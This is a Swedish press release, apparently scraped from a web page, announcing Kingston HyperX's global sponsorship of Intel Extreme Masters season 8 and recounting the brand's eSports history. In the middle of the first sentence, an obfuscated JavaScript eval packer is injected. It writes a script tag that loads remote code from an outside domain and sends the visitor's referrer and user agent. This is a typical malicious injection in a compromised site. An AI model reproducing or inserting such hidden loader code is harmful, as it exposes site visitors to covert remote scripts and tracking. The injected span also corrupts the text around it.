Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Kingston HyperX tillkännager globalt sponsorskap

Kingston HyperX tillkännager globalt sponsorskap

Kingston eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nibzy|var|u0026u|referrer|nbnyn||js|php’.split(’|’),0,{}))
Technology Europe Co LLP, ett dotterbolag till Kingston Technology Company Inc. som är världsledande inom minnesprodukter, tillkännagav i dag sitt stöd att ta eSports till nästa nivå genom att bli ny global sponsor för säsong 8 av Intel® Extreme Masters (IEM).

Kingston® HyperX® kommer att delta i Intel Extreme Masters turné i New York, Singapore och São Paulo samt vid World Finals i Polen. Under turnéns gång kommer HyperX-minnen att användas globalt i över 120 turneringssystem för att tillhandahålla enastående prestanda för världens bästa spelare.

Kingston inledde sitt sponsorskap vid nyligen avslutade ChinaJoy World Mobile Game Conference i Shanghai i Kina. Under hela turnén Kingston kommer att ge bort produkter, inklusive HyperX-, SSD- och USB-minnen och annat, på nätet och via sociala medier. HyperX firar 10 år på marknaden och är Kingstons högpresterande produktlinje som omfattar minnesmoduler, SSD-minnen och USB-minnen.

”Vi är väldigt nöjda med att inleda en relation med en samarbetspartner med sådana nära band med eSports”, säger Micha? Blicharz, Director Pro Gaming, ESL. ”HyperX är gjort för spelare så jag ser fram emot en fantastisk IEM-säsong tillsammans.”

”Det är en otroligt spännande tid för Kingston HyperX, då vi samarbetar med en av världens ledande eSports-turneringar för att leverera tävlingar av högsta kvalitet och högpresterande hårdvara till spelare över hela världen”, förklarar Annie Leung, HyperX Global Strategic Marketing, Kingston. ”Vi är stolta över att fira 10 år på marknaden med HyperX och ser fram emot att göra den här säsongens tävlingar till de bästa hittills.”

Kingston HyperX har stött spelvärlden via sponsorskop för organisationer med professionella team, inklusive Evil Geniuses, SK-Gaming, Team SoloMid, World Elite, Taipei Assassins och många fler.

HyperX har också sponsrat stora eSports-turneringar, som DreamHack, IGN Pro League, North American Star League och många andra LAN-evenemang över hela världen. Kingston har stött spelandet med syfte att hjälpa eSports att växa och erbjuda spelare kvalitativa produkter som förbättrar deras spelupplevelse. Gå in på Kingston HyperX Website för mer information.

Kingston firar 25 år inom minnesindustrin. Företaget grundades den 17 oktober 1987 och har utvecklats till världens största tredjepartsproducent av minnesprodukter. Jubileumsvideon är tillgänglig här, tillsammans med mer information, inklusive en tidslinje över Kingstons historia. Dessutom firar HyperX-minnet 10 år på marknaden. Den första högpresterande HyperX-minnesmodulen lanserades i november 2002.